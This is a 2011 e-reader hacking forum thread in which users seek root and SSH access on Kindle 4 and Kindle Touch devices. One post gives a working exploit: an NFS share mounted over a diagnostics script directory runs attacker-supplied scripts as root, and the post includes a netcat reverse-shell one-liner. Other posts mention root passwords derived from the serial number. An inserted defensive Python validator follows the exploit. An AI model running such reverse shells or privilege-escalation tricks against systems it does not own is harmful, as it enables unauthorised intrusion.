Old 12-08-2011, 10:08 AM   #211
theholyraptor
Junior Member
 
Posts: 3
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
For all of you who have already opened up your K4 touch... any of you have the 3g option? Anyone tried swapping sims out for an older 3g "unlimited" kindle? I doubt this will work and it's probably software based on the K4 but I'm curious.
Old 12-08-2011, 11:26 AM   #212
yifanlu
Kindle Dissector
 
Posts: 662
Karma: 170717
Join Date: Jul 2010
Device: Amazon Kindle 3
Nmap shows no open ports. Also, I've said this before, but the 3G restrictions are on the Kindle itself, not based on Amazon's servers. It's very easy to bypass.
Old 12-08-2011, 11:45 AM   #213
kkasmire
Member
 
Posts: 12
Karma: 1126
Join Date: Nov 2011
Device: Kindle Touch
Before I crack open my Kindle Touch to access the serial port, has anyone tried to run SSH? One way of doing this is to drop SSH into the user-accessible folders over USB, log in to the serial port console, and execute SSH from the console. Does this work?

Secondly, once this is performed, can SSH be integrated into the filesystem permanently, or does that require a new kernel?
Old 12-08-2011, 03:54 PM   #214
yifanlu
Kindle Dissector
 
Posts: 662
Karma: 170717
Join Date: Jul 2010
Device: Amazon Kindle 3
Quote:
Originally Posted by kkasmire View Post
Before I crack open my Kindle Touch to access the serial port, has anyone tried to run SSH? One way of doing this is to drop SSH into the user-accessible folders over USB, log in to the serial port console, and execute SSH from the console. Does this work?

Secondly, once this is performed, can SSH be integrated into the filesystem permanently, or does that require a new kernel?
If you can attach the serial port, you have full access to the filesystem where you can copy dropbear or openssl to /sbin or something and create a startup script to run it on startup.
Old 12-08-2011, 04:28 PM   #215
geekmaster
Everything ingenious is simple.
Posts: 5,069
Karma: 6789001
Join Date: Nov 2011
Location: Generosity has no limits.
Device: *.*
Early news: ramirami and dionoea reported having ssh over wifi working on kindle touch now too.

Last edited by geekmaster; 12-08-2011 at 04:57 PM.
Old 12-08-2011, 04:32 PM   #216
dionoea
Enthusiast
 
Posts: 26
Karma: 3060
Join Date: Dec 2011
Device: kindle 4
Hello,

I've found a method to execute an arbitrary shell script using the diagnostics image. This is kind of useless for kindle 4 non touch since we already have an easier method but it may enable access to kindle touch.
The instructions are a bit complex. They assume that you know how to use usb ethernet and set up an NFS share.

1. Create a USBnet.xml file in your kindle's root directory (over usb). This file will describe an NFS mountpoint. We will use that functionality to override a script which can be executed by the wifi test item in the diagnostics image. The content of the xml file should look like:
Code:
<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo ipNumber="15" device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts" host_NFS_path="/path/to/nfs/share/on/host/" />

2. Set up an NFS share on your computer as /path/to/nfs/share/on/host/ (or whatever you want to call it).

3. Reboot your kindle in diagnostics mode

4. Enable USBnet (see previous post #202 for instructions). If your xml file was properly read you should see something like:
ipAddress : 192.168.15.244
netMask : 255.255.255.0
deviceAddr: EE5900000015
hostAddr : EE2900000015
device_NFS: /opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts
host_NFS : /path/to/nfs/share/on/host/

5. Configure the network interface to use 192.168.15.201 on your computer. This is the IP address which the kindle will connect to to mount the NFS share.

6. In the same menu section as USBnet, mount the NFS share.

7. This is where things become interesting. On the NFS share, create an executable script called plat_YOSHI-SDIO.sh. Example content could be:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin

mount -o remount,rw /

echo "howdy"
echo "hey" > /hello.msg
echo "here" > /var/local/hello.msg
echo "ho" > /mnt/us/hello.msg

8. In the Misc individual diagnostics > Wifi Test menu, execute the WIFI ON item. This will run the above script. Note that the kindle might freeze afterwards but it's ok, the script was run.

9. Reboot and connect as a usb mass storage device. You should now have a hello.msg file.

This hasn't been tested on a touch yet but I've had confirmation that the script we're trying to override exists so it seems like a pretty safe bet.

Of course my example script is pretty useless. But something like the following script should get you a working sshd in the diagnostics image if you can get your hands on a kindle 4 non touch dropbearmulti binary:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin

# Make the root filesystem writable
mount -o remount,rw /
# Install the multi-call binary copied to the USB storage partition
cp /mnt/us/dropbearmulti /usr/local/bin/
mkdir -p /usr/local/sbin
# dropbear and dropbearkey are both symlinks to the multi-call binary
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbear
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbearkey
mkdir -p /etc/dropbear
# Generate the RSA host key through the symlink created above
/usr/local/sbin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
You could also try setting up a reverse shell using provided binaries only.
On the host computer run:
Code:
nc -l -p 1234

In the script:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /tmp
mknod in p
nc 192.168.15.201 1234 0< in | sh > in 2>&1

Once the script is run you should be able to run commands from the host as if on a normal shell (albeit without a prompt). For example running "find /" should output the full file listing.

I'd love to have feedback from touch owners.

Last edited by dionoea; 12-09-2011 at 08:37 AM. Reason: Add reverse shell idea
dionoea is offline   Reply With Quote
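
An added example, not part of the original thread or of Amazon's firmware: the procedure in post #216 works because a config file on user-writable storage chooses where the diagnostics image mounts a remote share. This Python example shows the missing check, confining `device_NFS_path` to one mount root; `ALLOWED_MOUNT_ROOT`, `make_config` and `check_usbnet_config` are hypothetical names, and the sample documents are constructed.

```python
import posixpath
import xml.etree.ElementTree as ET

# Assumption: the one directory a user-supplied config may mount a share on.
# Hypothetical value, not a path taken from the Kindle firmware.
ALLOWED_MOUNT_ROOT = "/mnt/nfs"


def make_config(device_path):
    """Build a constructed USBnet.xml in the shape shown in post #216."""
    return ('<?xml version="1.0" standalone="no" ?>\n'
            '<USB_NetInfo ipNumber="15" device_NFS_path="%s" '
            'host_NFS_path="/path/to/nfs/share/on/host/" />' % device_path)


def check_usbnet_config(xml_text):
    """Return (ok, reason) for a USBnet.xml read from user-writable storage."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, "unparseable XML: %s" % exc
    if root.tag != "USB_NetInfo":
        return False, "unexpected root element %r" % root.tag
    target = root.get("device_NFS_path")
    if target is None:
        return True, "no NFS mount requested"
    if not target.startswith("/"):
        return False, "mount target must be an absolute path"
    # Collapse "." and ".." before comparing. On a real device the check would
    # also resolve symlinks (os.path.realpath) at mount time.
    norm = posixpath.normpath(target)
    inside = norm == ALLOWED_MOUNT_ROOT or norm.startswith(ALLOWED_MOUNT_ROOT + "/")
    if not inside:
        return False, "mount target %s is outside %s" % (norm, ALLOWED_MOUNT_ROOT)
    return True, "mount target %s accepted" % norm


if __name__ == "__main__":
    samples = [
        # Path from the post: overlays a directory of scripts run by a diag test.
        "/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts",
        "/mnt/nfs/share",                # constructed: stays inside the root
        "/mnt/nfs/../../etc/init.d",     # constructed: traversal out of the root
    ]
    for path in samples:
        print(check_usbnet_config(make_config(path)))
```

Path validation is only one layer; keeping scripts that run as root out of any directory a share can be mounted over addresses the same root cause.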
Old 12-09-2011, 04:29 AM   #217
salfred
Junior Member
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
I happened to find that the 4.0.1 update modified the root password of the diag image.
@dionoea
Your method is exactly what I thought about. I also tried mounting an NFS share of init.d.
It works on K4 non-touch 4.0.1.
Old 12-09-2011, 04:57 AM   #218
dionoea
Enthusiast
 
Posts: 26
Karma: 3060
Join Date: Dec 2011
Device: kindle 4
Quote:
Originally Posted by salfred View Post
I happened to find that the 4.0.1 update modified the root password of the diag image.
Do they use fiona+hash in 4.0.1?

Quote:
@dionoea
Your method is exactly what I thought about. I also tried mounting an NFS share of init.d.
It works on K4 non-touch 4.0.1.
Oh ... I tried exploiting it by mounting on init.d but couldn't get the scripts to be executed.
Old 12-09-2011, 05:01 AM   #219
karl_k
Junior Member
 
Posts: 8
Karma: 10
Join Date: Nov 2011
Device: Kindle4
howto howto howto !!

Hey seaniko7 / dionoea !

Quote:
Originally Posted by seaniko7 View Post
Actually "mario" password didn't seem to work for me, but by generating fionaXXXX from serial number I've successfully ssh'd to my Kindle 4 and played a little with rootfs ( screensavers, some init.d scripting etc. ). Thanks dionoea
Now I made myself nice nice screensaver and font "hacks".
I know it's highly experimental and might brick the K4 no-touch, but would you be so kind and write up the steps you took? I just want to change the screensaver pics, but ssh via wifi would also be super-cool!

Cheers,
Karl

Last edited by karl_k; 12-09-2011 at 05:03 AM.
Old 12-09-2011, 05:21 AM   #220
salfred
Junior Member
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
Quote:
Originally Posted by dionoea View Post
Do they use fiona+hash in 4.0.1?


Oh ... I tried exploiting it by mounting on init.d but couldn't get the scripts to be executed.
Confirmed, 4.0.1 uses fiona with hash as password.
And I made a mistake, the NFS share of init.d doesn't work. It was because my sshd survived that update XD
Old 12-09-2011, 05:40 AM   #221
seaniko7
wannabe developer
Posts: 181
Karma: 156548
Join Date: Mar 2011
Device: Kindle: 2xKeyboard, Classic, 2xTouch, 2xPW, PW2; Onyx: Boox M92
Quote:
Originally Posted by karl_k View Post
Hey seaniko7 / dionoea !



I know it's highly experimental and might brick the K4 no-touch, but would you be so kind and write up the steps you took? I just want to change the screensaver pics, but ssh via wifi would also be super-cool!

Cheers,
Karl
Yup, I'll make a tut, which will also include the steps needed for unbricking (I messed up init.d while forcing it to load usbSerial on start, which obviously caused a brick, and it was tricky to fix because the recovery kernel won't allow you to export mmcblk0p1).
Old 12-09-2011, 06:03 AM   #222
stalker_by
Junior Member
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
Hi folks,

I'm trying to get SSH on my Kindle 4 non-touch, but it fails at the usbNet step.
When booting to Diag mode I didn't see the "Enable usbNet" item. Text on screen, from the top:

Code:
TEQUILA - System Diags
---- 1.0.6.194 --- -1097929848 ---

S) Device Settings
O) Operator test suite
R) Run in Test
G) Gas Gause
E) 511
T) Power Test
H) Adjust battery
M) MoviNand
N) Misc individual diagnostics
Y) ART 11g factory test
U) USB device mode
D) Exit, Reboot or Disable Diags
------------------
X) Exit - FW RIGHT to exit
Where am I wrong?
Old 12-09-2011, 06:14 AM   #223
AlexeyII
Junior Member
 
Posts: 9
Karma: 10
Join Date: Dec 2011
Location: Uzbekistan
Device: Kindle 4
Quote:
Originally Posted by stalker_by View Post
Hi folks,

I'm trying to get SSH on my Kindle 4 non-touch, but it fails at the usbNet step.
When booting to Diag mode I didn't see the "Enable usbNet" item. Text on screen, from the top:
Code:
N) Misc individual diagnostics
Where am I wrong?
select bolded
Old 12-09-2011, 06:30 AM   #224
dionoea
Enthusiast
 
Posts: 26
Karma: 3060
Join Date: Dec 2011
Device: kindle 4
Quote:
Originally Posted by karl_k View Post
I know it's highly experimental and might brick the K4 no-touch, but would you be so kind and write up the steps you took? I just want to change the screensaver pics, but ssh via wifi would also be super-cool!
You can use the instructions I posted in reply #202 . They're easy to use and work fine on the non touch. The complex NFS instructions should only be required for the touch version.
Old 12-09-2011, 07:03 AM   #225
stalker_by
Junior Member
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
Got it.

Anyone know how to disable ads?
All times are GMT -4.